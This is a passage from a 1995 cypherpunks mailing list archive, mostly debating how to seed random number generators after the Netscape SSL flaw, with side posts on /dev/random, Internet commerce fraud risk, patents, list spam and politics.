(which is "bad"). Imagine a customer having a chip which he finds out
produces very little entropy, for technical/manufacturing reasons.


>You probably can't build a hardware random number generator out of
>existing "gate array" gates or "standard cell" cells, because all the
>existing gates and cells are designed to behave completely
>predictably!  It will take designing a new circuit structure.

You probably can, actually. CMOS and BiCMOS have all sorts of structures in
which threshold voltages can be measured. DRAM arrays have various
seemingly-random (*) discharge characteristics. Zener diodes can be built
in any of these technologies. At small enough structural levels, such as we
are now seeing at the .35 micron level and below, noise is omnipresent, and
is dealt with in various ways. Thus, using the noise is not so difficult.

(* The various charge/discharge characteristics are actually not random, of
course, and are reproducible. But with care they can be used to increase
the entropy of other soources. Care must be taken.)


>Do we know any solid state physics / circuit design experts who think
>this might be a fun thing to do?  I bet you could get a paper out of
>it.  And probably improve the world a few years later, when companies
>used your paper to close another hole in their computer security.

I'm skeptical for the reasons given above. Even starting today, far too
long to get enough out there. (Far-future thinkers will say, "Then let's
start now," but it still is not true that companies like Netscape or
Verisign will use such an invention to close another hole...they could only
close the hole for the customers who had the HRNG-equipped machines, and
this is not likely to be enough for quite some time.

As John knows, but others may not, I worked on random noise effects in
devices at Intel. A co-worker (now President of IC Works, Ilbok Lee) and I
developed a hardware random number generator based on very low level
radiation sources, using an effect I discovered. We tried to get a patent
on it, in 1978, but there was no interest by Intel.

Personally, I think that "software + user actions + environment stuff" can
generate vast amounts of usable entropy, especially if a user lets it
accumulate immediately prior to generating crypto material.

* Software -- the standard cryptographic hash functions to "mix" bits even
further.

* User Actions -- mouse movements, keyboard timing, microphone noise, etc.

* Environmental Stuff -- measurement of disk access timings, in
milliseconds, amount of free blocks, Ethernet packet stuff, etc. (This may
or may not be good for more than a few bits per second, but can be
accumulated for several minutes or hours.)

Any of these has various weaknesses and points of attack. But let's face
it, would Golberg and Wagner have been able to crack Netscape if the PRNG
had used some mouse swirling, some random keyboard pounding, some disk
access measurements, and had then hashed this with a noninvertible hash
function? I think not.

This approach has the benefit of working almost immediately, without
special dongles on the back of machines or of convincing Intel and Motorola
to add special functions (which would take years to effectively penetrate
the market).

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Wed, 20 Sep 95 17:20:51 PDT
To: cypherpunks@toad.com
Subject: Re: www.commentary.unabomber
Message-ID: <199509210020.RAA15682@usr5.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Go FrogFarm Go!

From: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Subject: Re: www.commentary.unabomber
To: carolann@censored.org
Date: Wed, 20 Sep 1995 20:03:45 -0400 (EDT)
X-Angst-Level: Fair to Middlin'
X-Authentication-Vegetable: Aardvark
X-NSA-Food: narcotics anarchy bosnia encryption assassinate
X-Thrash-Confirmation: Ahh! Hippy on a stick!
Organization: Somewhere just far enough outside of your jurisdiction 
Reply-To: frogfarm@yakko.cs.wmich.edu

Yes, it's a complete version. I've also started a rudimentary rebuttal/
commentary page at

http://yakko.cs.wmich.edu/~frogfarm/unabuttal.html

- --
frogfarm@yakko.cs.wmich.edu (Damaged Justice) is officially declared Unmutual
   s..O).... The smurf wields a hypodermic! -- More --    I like women who
   @.../.".. You destroy the smurf! -- More --            are *strong*, in
   .$*...].. You feel self-righteous!       <B>every</B> sense of the word.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMGCvXIrpjEWs1wBlAQFHWAP9Fnf7patTds/KSr6EssfDgZvZKSQiTSqT
ddK52W1cbAI+oJT46v0rX2Z7gQeibjHu64jCpQLj7df62p11RD7ElseD9EOJLjUX
wUOy5+ap9+dbdr1FViWgwG+B6qExmrduZTsJ3jHz8Fq6cxd8e5iRW+R61wT4Ph1W
wZtDiMrUpIE=
=UQy3
-----END PGP SIGNATURE-----
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 20 Sep 95 20:47:30 PDT
To: cypherpunks@toad.com
Subject: Re: USA Today on Fear of Credit Cards over Net
In-Reply-To: <AL9OmyczByUU075yn@netcom.com>
Message-ID: <199509202335.TAA05761@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Re: The risk of credit cards.

I suppose that indeed there are large risks elsewhere in the credit
card system. However, I think that the credit card system itself is
stupid and insecure and ought to be scrapped -- sending around account
numbers as magic keys to get payment is a stupid move. Its not
suprising how large credit card fraud is.

One of the great hopes I have for cryptographic technology is its
ability to lower the incidence of fraud, and thus lower transaction
costs a lot. Someday, hopefully, everyone will be able to be a credit
card merchant because you won't have to trust the merchants not to
steal.

Perry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: karlton@netscape.com (Phil Karlton)
Date: Wed, 20 Sep 95 13:15:25 PDT
To: cypherpunks@toad.com
Subject: "random" number seeds vs. Netscape
Message-ID: <43psn2$6ug@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Let me start off by saying that I speak for me and not Netscape. I
also tend to be UNIX centric since I know very little (nothing?) about
the internals of PCs and Macs.

I want to address the bug Netscape has with its currently released
product with respect to seed generation. For the most part this is not
a crypto issue, but rather a system issue.  Those bits of entropy can
only be gathered in a system dependent manner.

Assumption:

    We are relying on the MD5 hash algorithm to gather the string of
    potentially unpredictable sequences. I am assuming that feeding
    known bits along with the unknown will not compromise the
    "randomness" of the MD5 state.

    The basic idea is to feed a sequence of information into the MD5
    hash, expecting that some of the bits for each sub-sequence would
    be only be guessable. If we get enough unguessable bits into the mix,
    then the weak link in the chain would not be the seed generation.

Here is what the client will soon be doing:

    Netscape is available on Macs, Win-16 and Win-32 versions and
    8 different UNIX platforms. The exact details for each platform are
    quite system specific. The basic idea is to feed a sequence
    of information into the MD5 hash, expecting that some of the
    bits for each sub-sequence would be unguessable.

  At program start

    On all platforms:

	Start with the contents of the highest resolution clock we can
	find on the system. [For instance, an R4000 MIPS processor has
	a free-running instruction counter. At 100 Mhz this gets
	incremented every 10 nano-seconds. There are probably a good
	20 bits of unguessable value there.] On Macs and Win* systems
	there are "tick" counters that update 60 (or maybe only 16)
	times a second. We then push through the time of day, beacause
	on some sytems, the microsecond part of a time_val has some
	bits that are only guessable.

    For UNIX we feed the following into the MD5 hash:

	ps (-el or aux depending upon system)

	netstat -ni & netstat -na

	the user's environment. (We will certainly use this as well in
	the 2.0 release. The truly paranoid will be able to run
	whatever seed generator they want and stick the result into
	their environment. How you protect your environment from
	attack is up to you. ;-)

	System specific info such as hardware serial number or
	system id. If you have specific suggestions for any
	particular OS/hardware pair, please let me know.

    For PCs

	Cursor position

	Global memory status

	FreeSpace

	Drive configuration

	Number of running tasks

	Environment strings

	UUIDCreate if there is an ethernet card

	Clipboard owner and contents

	Current process, processID and window

	Free clusters on the disk

    For MACs:

	Machine location (longitude and latitude)

	User name

	Mouse location

	keyboard time threshhold

	last key pressed

	audio volume

	current directory

	current process

	process information for every task  on the system

	stack limits

	zones

	scrap sizes and counts

	event queue

    And then on all platforms

	The stat (file access, creation, modify times, size, inode
	equivalent) and contents of a number of "interesting" files.
	[Where is the PGP random number state file stored?]

	A portion of the contents of the screen.

	And finally, the contents of the highest resolution clock we
	can find.

  Each time the client goes idle

    Reinitialize the seed with the most recent user event (probably
    a button or key down) along with the mouse position, and and
    relatively high resolution clocks.

Known weaknesses:

    If your X display is not the local machine then the X protocol can
    be watched. Given that, the data for the reseeding of the MD5 hash
    will be compromised. [Any scheme that relies on random user input
    to generate a seed suffers from the same problem.]  This is not
    quite as bad as it might be. The exact time of the client becoming
    idle can only be guessed. We should be able to get a few
    unguessable bits from the microsecond part of the time-of-day
    clock each time. Enough cycles of user actions should help to make
    the hash less subject to a brute force attack.

    In fact, the entire X protocol issue is one that could take up
    another 3 pages. An SSLized version of the server would help,
    but how would anybody export it? You "xhost +" fans are doomed.

    If the user launches the client to a secure home page then there
    will be no user actions involved before the first need for a seed.

Thoughts on guessing:

    If Eve has root access to the user's workstation, all bets are off.
    Replacement of one of the system libraries or patching the client
    executable are among the attacks that would make it trivial to
    breach any part of the security. Specific measures (like computing
    a hash over the text of the program) could help against some of
    these attacks, but it is not realisitic to believe that we can
    prevent the attack from a sophisticated person with root access.

    Multi-user Unix machines present a special problem. There are those
    at Netscape that argue that anybody who has login access to your
    machine may as well be considered to have root access. There are
    enough known attacks that this is true to a large extent.  However,
    I think we can do better than just giving up. Unfortunately most of
    the sources of entropy available to the client are also available
    to the attacker. For instance, the output of "ps" is not much help
    against this form of attacker. As Jeff Weinstein said earlier and I
    echo here: specific suggestions are more than welcome.

    When Eve has access to the wire for all of the packets into and out
    of the user's workstation, then some of the networking information
    can be guessed. See above about known weaknesses if Eve has access
    to the X protocol stream.

    I am most comfortable about the "randomness" of the generated seed
    if Eve is outside a fire wall sniffing packets. The difficulty in
    guessing what processes/tasks are running on the target machine is
    quite a bit of help here.

What I would like:

    Any OS has access to a number of real-world physical sources of
    randomness. This information is not made available to a user level
    process. How long did that last seek take? Was there any noise on
    the microphone? It would be good if the OS could gather that
    information and make some set of bits available to any process that
    asks. Having this be part of all OSes would make my job easier.

    More specifically: A "getnoise()" system call in UNIX could be
    better than anything I can do and easier. Can we convince the UNIX
    vendors to start providing that?

    My life would have been simpler if this attack had been done after
    the 2.0 version of the client had been released. :-) Believe it or
    not, we were beginning to beef up the seed generation a couple of
    weeks ago. The time spent on patching the current release will not
    all go to waste, but it has cut down on my limited opportunities to
    sleep.

For those that curious: being responsible for helping to fix a bug that
is getting front page coverage in major newspapers is not nearly as
much fun as it sounds.

PK
--
Philip L. Karlton			karlton@netscape.com
Principal Curmudgeon			http://www.netscape.com/people/karlton
Netscape Communications Corporation




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Simmons <jsimmons@goblin.punk.net>
Date: Wed, 20 Sep 95 20:49:14 PDT
To: perry@piermont.com
Subject: /dev/random for Linux
In-Reply-To: <199509202227.SAA05667@frankenstein.piermont.com>
Message-ID: <199509210319.UAA04352@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> On this same track, I suggest that "/dev/random" devices for unix are
> an excellent idea. Ted Tso did one for Linux that steals all the bits
> of semi-random timing information it can.
> 
Anyone know where I can find more information on this wonderful device?

-- 
Jeff Simmons                           jsimmons@goblin.punk.net



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Wed, 20 Sep 95 20:23:19 PDT
To: hughes@remailer.net
Subject: Spam of c'punks list: cleaning it up now.
Message-ID: <9509210323.AA03882@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Somebody, apparently at ci.diamond-bar.ca.us, has been feeding the last
month's worth of Cypherpunks postings back to the Cypherpunks list.
You probably saw a few of them.  They are still coming in to toad.com.

When I got home this afternoon, the load average had hit 150 and most
of them were copies of sendmail.  This prevented most of the messages
from getting out to you, happily.  I've cleaned up the ones I found in
the queues, and I'll start working next on getting the *valid*
cypherpunks messages flowing again...

	John Gilmore




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Wed, 20 Sep 95 17:28:40 PDT
To: cypherpunks@toad.com
Subject: Selling our spin. was: Cypherpunks Press release
Message-ID: <73484.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


  Kevin L Prigge <klp@gold.tc.umn.edu>  writes:
> Does anyone know exactly how the press contact thing works? My impression
> is that a reporter/journalist stumbles on to someone who knows something
> about a particular area, and is willing to be interviewed. Then the next
> time a story comes along that deals even slightly with that subject, the
> reporter will tend to contact that person.

I think the "exact" process varies with the journalist. But you have
it generally correct. The press runs on reputations. When a writer
gets a story, they look for "reliable sources" to contact. Reputations
are based on a lot of things, including knowledge, speaking ability, looks
and the ability to emit a sound-bite that is interesting. it is a strange
process. I mean, I even got on CNN during the Morris worm.

Tim is right, there is no "we" here. We can't have an official spokesperson,
we don't agree on much. But we can work from the ground up. There
are a number of serious cryptographers on the list, or at least
friendly to the list when the S/N ratio makes sense.

With a little work, we should be able to find a fairly long list of
media contacts. We can even make it media friendly.

From people I've personally seen recently, we could have
Doug Humphrey of Digex (nice to have a security-related company President)
Bob Stratton of UU.Net (corporate security wiz)
Carl Ellison of TIS (usually on c'punks light and at all DCcp meetings)
probably others at TIS such as Ken Mendelsen or Steve Walker

For the political side, the folks at EFF, CDT, EIPC, etc.

And there are others that could be good contacts, such as
William H Murray of Delloite and Touche,
Matt Blaze of [Bellcore|BellLabs]

It might take a while to get permission for referal, but I expect that
most security consultants would consider being quoted in mainstream
press to be good advertizing.

If we make it easy, anyone would be willing to take advantage of the
resource. We should also inclue a representative sample of folks who
disagree with us. Any real list should include Dorothy Denning and other
supporters. We can simply stack the deck.

We can make sure that the mainline journalists know where to look, and
make sure that CDT, EFF, ACLU, and EPIC have references that are ready when
they are asked for referals.

Assuming my web server recovers from the mention in comp.risks, I'm
more than willing to accept suggestions and have a "security spokes-folks"
page.

Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Van Wie <dvw@hamachi.epr.com>
Date: Wed, 20 Sep 95 20:47:52 PDT
To: "'cypherpunks'" <cypherpunks@toad.com>
Subject: Re: Encryption algorithms used in PrivaSoft (fwd)
Message-ID: <3060D3B3@hamachi>
MIME-Version: 1.0
Content-Type: text/plain



David Clavadetscher of PrivaSoft writes:
> At this time our crypto engine is patented and proprietary.

Ian Goldberg writes:
> Waitasec...  I was under the impression that if you patented it, you had 
to
> reveal it.  That's why RC4 isn't patented (it used to be a trade secret).

Many technologies have both patented parts and trade secret parts.  Often, 
companies will maintain information that is in patent applications as trade 
secret until they are granted.  I guess I should say _if_ they are granted! 
 After a patent is granted, it is usually a good idea to also maintain some 
trade secrets in your products -- since trade secrets never "expire," unlike 
patents.  If the patent isn't granted, you still have the option of treating 
the contents as an intellectual property under trade secret protection.

dvw





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew.Spring@ping.be (Andrew Spring)
Date: Wed, 20 Sep 95 12:08:47 PDT
To: cypherpunks@toad.com
Subject: MD5 in Eudora
Message-ID: <v01510100ac838e1b7785@[193.74.217.11]>
MIME-Version: 1.0
Content-Type: text/plain



I was just poking around in Eudora for the Mac with ResEdit, and I found a
CODE resource labelled MD5.

Any idea why Eudora is using MD5 hashes?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James Caldwell" <jcaldwel@iquest.net>
Date: Sat, 30 Sep 95 19:57:30 PDT
To: "ASICEO@internetMCI.COM>
Subject: Re: Operation Stop The Aliens
Message-ID: <m0szEOd-00035JC@dorite1.iquest.net>
MIME-Version: 1.0
Content-Type: text/plain



To whom it may concern:



This fellows proposed  actions are those of a blind fool who cannot
see the forest for the trees. A such he is nothing more than part of
the problem.

He sees foreign immigrants, legal or illegal, as being a problem.
The problem he is seeing is not any problem created by the immigrants
who are looking for something better, but one created for the very
purpose of distracting such fools as him from the underlying problems
his state this Nation faces. 

He has bought the lie spewed by the talking heads and other
psycological operations that have told him to think the 'illegals'
are causing some sort of problem.

Prop 187 and such proposals are nothing more than a method to have 
implemented systems and plans, not to correct the alledged problem, 
but to implement an underlying plan that was the desired goal from 
the start; namely a national ID and tracking system.

This is a typical tactic, race against race, religion against
religion, etc. all to divide us into small, blind, ineffective,
bickering groups who have little voice and no cohesive political
power.

If his actions do not accelerate what is already occuring then the 
real enemy is alseep, as it is a wonderful opportunity for further 
psycological operations that will benefit them in numerous ways.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 20 Sep 95 22:19:11 PDT
To: Deranged Mutant <cypherpunks@toad.com
Subject: Re: Silly NetScape RND tricks...
Message-ID: <199509210519.WAA08441@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:05 PM 9/20/95 -0400, Deranged Mutant wrote:
>
>I've only been skimming the NetScape-related posts lately, but I've yet
>to see anyone mention using a keyboard-timing sampler as a source for
>some random bits

Under windows, you get a lot more entropy from mouse timing and position
than keyboard hits.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter Conrad <conrad@unix-ag.uni-kl.de>
Date: Wed, 20 Sep 95 12:24:53 PDT
To: aba@atlas.ex.ac.uk
Subject: Re: Linking = Showing = Transferring?
In-Reply-To: <10345.9509151143@exe.dcs.exeter.ac.uk>
Message-ID: <9509201922.AA11324@pizza.unix-ag.uni-kl.de>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hi,

> Browser in the US, text in US, crypto gif imported from UK, both legal.
> 
> Browser outside US, text in US, crypto gif imported from UK, both legal.
> 
> See a flaw in that?

Not directly, but... what if for some strange reason the image is routed
through US gateways on its way from the UK to, for example, Germany?
I mean, The Net (tm) is a strange beast, and you can rarely tell which way
the message flows... you can't even DO anything about it.

Bye,
	Peter
- -- 
Peter Conrad    | "Those people who tell you not to take chances, they are all
Am Heckenberg 1 |  missing on what life's about, you only live once, so take
56727 Mayen     |  hold of the chance, don't end up like others the same song
Germany         |  and dance!"                      - Metallica, 'Motorbreath'

         Email: p_conrad@informatik.uni-kl.de,conrad@unix-ag.uni-kl.de

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAgUBMGBpBbFFskV8RCVHAQGyEwQA2QD4FdrHzKAiiiA/MneC66SU8SBo5neS
3kErDNJZQ1vK5qSR7XuSQSJY/svW3F6YozmgG7YD8RcYwoY8O3OjSaEaOmrRqpIi
qftdceLmf5o9O1NktXBLEPTw/qm4IOVwTD4l2P+zsbwvuZpHYt8hBg3bLZm2Xtvy
1OzPp95OzTE=
=HqWo
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 20 Sep 95 22:32:16 PDT
To: karlton@netscape.com (Phil Karlton)
Subject: Re: "random" number seeds vs. Netscape
Message-ID: <199509210531.WAA09687@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 05:01 PM 9/20/95 -0400, Perry E. Metzger wrote:

>PC timers inherently run at Mhz speed -- they interrupt every 100th of
>a second but you can get finer resolution by querying the clock
>chip. Does Windows let you do this?

Yes:  1.196 MHz precision.

The VTD maintains a 64-bit value that is accurate to 0.8 microseconds. This
value is obtained by calling the VTD with AX set to 0100h. The 64-bit value
is returned in EDX:EAX. The returned value indicates the time Windows has
been running based on a 1.196 MHz clock.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Wed, 20 Sep 95 20:46:59 PDT
To: Laurent Demailly <dl@hplyot.obspm.fr>
Subject: Re: first virtual "security" (!!) (was Re: Security Flaw Is Discovered In Software Used in Shopping)
In-Reply-To: <v02120d1aac85dff6bc68@[199.0.65.105]>
Message-ID: <0kMA2EqMc50eMEb4Yx@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Laurent -- I strongly recommend that you make an effort to understand
the real risks involved in Internet commerce.  There are critical
security flaws in the encrypted commerce approach, which I fear you are
overlooking.  By focusing on the ease of stealing a single identifier,
or faking a single transaction, I think you overlook some much more
important issues.

The point is not that people can't intercept your First Virtual ID by
sniffing on the net.  Obviously they can.

The point is not that people can't forge mail from you.  Obviously they can.

The point is not that people can't intercept FV's confirmation query,
which contains a one-time code, and forge the appropriate response to
authorize that purchase.  Obviously they can.

The point is not that people can't selectively block your incoming mail,
so that you can't even tell when the above has happened.  Obviously they
can.

The point is that if someone goes to all the trouble of doing all the
above -- which is what it takes to commit serious fraud with First
Virtual -- then *all* that they get is the temporary use, on the
Internet only, of a single credit card.  (Note also that I've just
spelled out *exactly* what it takes to commit fraud with FV.  I am
suspicious of any commerce systems that don't offer such an explanation.
 In the case of SSL, the explanation would probably start out, "find a
single bug in the implementation of the cryptographic algorithms.")

Schemes like SSL, which encrypt a credit card number and then transmit
it on the net, carry with them a very different kind of risk:  the risk
that a single criminal could steal MILLIONS of credit card numbers.   
If an SSL-like scheme were in wide use world-wide, the hacker who just
made a name for himself by breaking SSL could instead have gone down in
HISTORY as the person who destroyed the twentieth-century credit card
system by stealing millions of credit cards and using each one just
once.  Or, if his goals were more practical, he could have simply chosen
any desired level of affluence and lived that way for the rest of his
life.   (This is not an exaggeration.  I can flesh this out to an
alarming degree of detail, actually.)

FV does not claim to have invented a method of commerce that is
foolproof.  There is no such system, and that certainly includes the
existing credit card, cash, and check infrastructure.  What FV has
invented is a system for Internet commerce in which the risk/reward
ratio is sufficiently low to permit large-scale commerce.  Any
cryptographic approaches which make similar claims must also be
evaluated in terms of risk/reward ratio.  If a system has a catastrophic
risk, no matter how low-probability, this is worse than a system with
higher-probability risks of much lower consequence.  (When driving my
car, I'd rather be in ten fender-benders than one high-speed head-on
collision at 90 MPH.)

My own experience with real-world software -- which is only confirmed by
the recent SSL scandal -- makes me tend to believe that every program
has bugs, and that therefore every crypto system will carry with it a
significant practical risk of compromise.  It therefore makes no sense
to design the commerce infrastructure in such a way that the cost of
that risk is catastrophic.  FV has had several minor incidents of fraud.
 They didn't make any headlines and they didn't require any mad scramble
to fix the software, because the costs of the fraud were so low to all
concerned.   -- Nathaniel
--------
Nathaniel S. Borenstein <nsb@fv.com>    |           When privacy is outlawed,
Chief Scientist, First Virtual Holdings |     only outlaws will have privacy!
FAQ & PGP key: nsb+faq@nsb.fv.com       | SUPPORT THE ZIMMERMANN DEFENSE FUND!

---VIRTUAL YELLOW RIBBON-->> zldf@clark.net <http://www.netresponse.com/zldf>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: herbs@interlog.com (Herb Sutter)
Date: Wed, 20 Sep 95 20:46:26 PDT
To: cypherpunks@toad.com
Subject: Re: Please send me SSL problems...
Message-ID: <199509210134.VAA09069@gold.interlog.com>
MIME-Version: 1.0
Content-Type: text/plain


At 18:18 1995.09.20 -0400, Ian Goldberg wrote:
>In article <199509201004.DAA23933@ammodump.mcom.com>,
>Jeff Weinstein  <jsw@netscape.com> wrote:
>>
>>  I'd just like to let all cypherpunks know that I'm really interested in
>>getting any feedback you might have about security problems with Netscape
>>products.  I'm particularly interested in bugs in the our implementation
>>of SSL, and problems in the protocol that are not addressed in SSL 3.0.
>
>Well, if you'd release Netscape source, we could check its
>implementation... :-)
>
>   - Ian

Mmm... sounds like they want some free consulting. :-)

(BTW, Ian, you're at UofW?  I thought your original 'discovery' email of
three days ago had a berkeley.edu address on it... anyway, if you are a
UofW'er, hello from a fellow Waterloo math/cs grad!)

Herb

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Herb Sutter                 2228 Urwin, Suite 102       voice (416) 618-0184
Connected Object Solutions  Oakville ON Canada L6L 2T2    fax (905) 847-6019





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 20 Sep 95 23:27:45 PDT
To: cypherpunks@toad.com
Subject: Re: (none)
Message-ID: <199509210627.XAA14935@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 06:05 AM 9/21/95 GMT, Phil Karlton wrote:
>James A. Donald <jamesd@echeque.com> writes:
>    Whenever you need a random number, take a one way checksum, 
>    for example MD5, of the most recently altered part of that 
>    buffer.  Use that as your random number. 
>
> How is this any better than feeding the data into the MD5
> hash as I go? This is not a rhetorical question.

Assuming that MD5 loses no entropy, it is identical, or very similar in
strength, since in the algorithm that I described the most recently altered
part of the buffer depends sensitively on all previous noise accumulated
into the buffer, so if the total cumulated entropy is larger than your block
size, you are OK.

However the algorithm I described simply used less computation, but the
overhead of continually doing MD5 is probably modest. 

No matter what you do, if you cumulate a hundred bits of entropy, and if you
use a one way hash to generate random numbers so that your session keys do
not leak information about your entropy, you are going to be safe against a
random number generator attack.

I suggested accumulating a very large amount of entropy, but obviously this
is just gilding the lily.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 20 Sep 95 23:39:58 PDT
To: David Van Wie <cypherpunks@toad.com>
Subject: Re: Entropy vs Random Bits
Message-ID: <199509210639.XAA15833@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:51 PM 9/20/95 P, David Van Wie wrote:
> This is odd.  The term entropy describes an aspect of thermodynamic 
> equlibrium in physical systems.  Although sometimes used as a synonym for 
>"random," that definition is vernacular, not technical.  In fact, there is 
> no meaningful relationship between "entropy" and random data of the type 
> described in the postings related to seed values.  In the presense of a 
> perfectly suitable and precise mathematical term (i.e. random),

Your use of the word random is incorrect:  The throw of a dice is 
random, but only contains 2.6 bits of entropy.

The windows VDT counter is very far from being random, but 
contains roughly sixteen bits of entropy.

> why invent new terms?  Why use them to mean at least two different things?

This is old term of the art, a term of information theory:  We use 
the same word because entropy in information theory has the same 
measure as entropy in thermodynamics.

In both cases the entropy, measured in bits, of an ensemble of 
possible states is sum of  - P(i) * lg[P(i)] over all the possible states.


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Wed, 20 Sep 95 22:52:27 PDT
To: cypherpunks, gnu
Subject: Netscape is doing well -- give 'em a break.
In-Reply-To: <199509202041.NAA07036@comsec.com>
Message-ID: <9509210552.AA07852@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> > around at the time that this code was being written.  I must admit that
> > the RNG seed code was not an area that I thought to examine when I took
> > over our security library.
> 
> 	I don't know what your background is, so don't take this as a
> personal attack please, but someone who is trained in computer
> security and cryptography implementation should *know* to check these
> things. Hell, even I would check those things, and I'm not a
> cryptographer by any means.

Hey folks, lighten up!  

Netscape is to be commended for even *putting* crypto into their
product!  Of course the first version is going to have a few screwups;
they're in a fast market and things must be done in a hurry.  But they
are showing a real committment to securing Internet privacy and
commerce -- with real algorithms and without key escrow.  They hired a
real cryptographer, and their security programmer is a cypherpunk.
They've told the world they will put the real "domestic" version out
for public use.  This is a step that a very small number of companies
even bother with; most don't even have a high-security unexportable
version.  They're combing the net for better random number algorithms.
We could do a lot worse!

Cygnus' Kerberos faced the same random-seed problems and punted in
similar ways.  Our random numbers are derived from the time and the
PID and etc.  You can read the sources to see.  Ted Ts'O claims it is
harder to exploit them because they're mixed in (with DES encryption)
with a secret key, either the Kerberos database's master key on the
server, or the session key from the ticket on the client.  But I
haven't done a full blown security analysis of this scheme.  I was too
busy trying to productize it on eight platforms, write real
documentation, do customer support, and make it run on the *^*&%&&#
Macintosh.  I did have it marked in my mind as something to look at
"when I had the time".  If you-all have the time, hey, go for it!
Might as well look at the one in MIT K5, since that's the development
tree from which all future Kerberoses will come.

All progress is by steps.  Let's step on each others' shoulders, not
on each others' toes.  Netscape is doing us a favor by pushing strong
crypto.  We are doing them a favor by pointing out problems before
they cause major losses to Netscape customers.  The result is higher
security for everyone, and more respect for each other's efforts.  So
kindly show them a little...

	John Gilmore






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sal@panix.com (Sal Denaro)
Date: Wed, 20 Sep 95 21:37:29 PDT
To: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Subject: Re: AOL monitoring
In-Reply-To: <Pine.SUN.3.91.950919154430.8469E-100000@hertz.isr.umd.edu>
Message-ID: <XrNYwAgbBE6A084yn@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


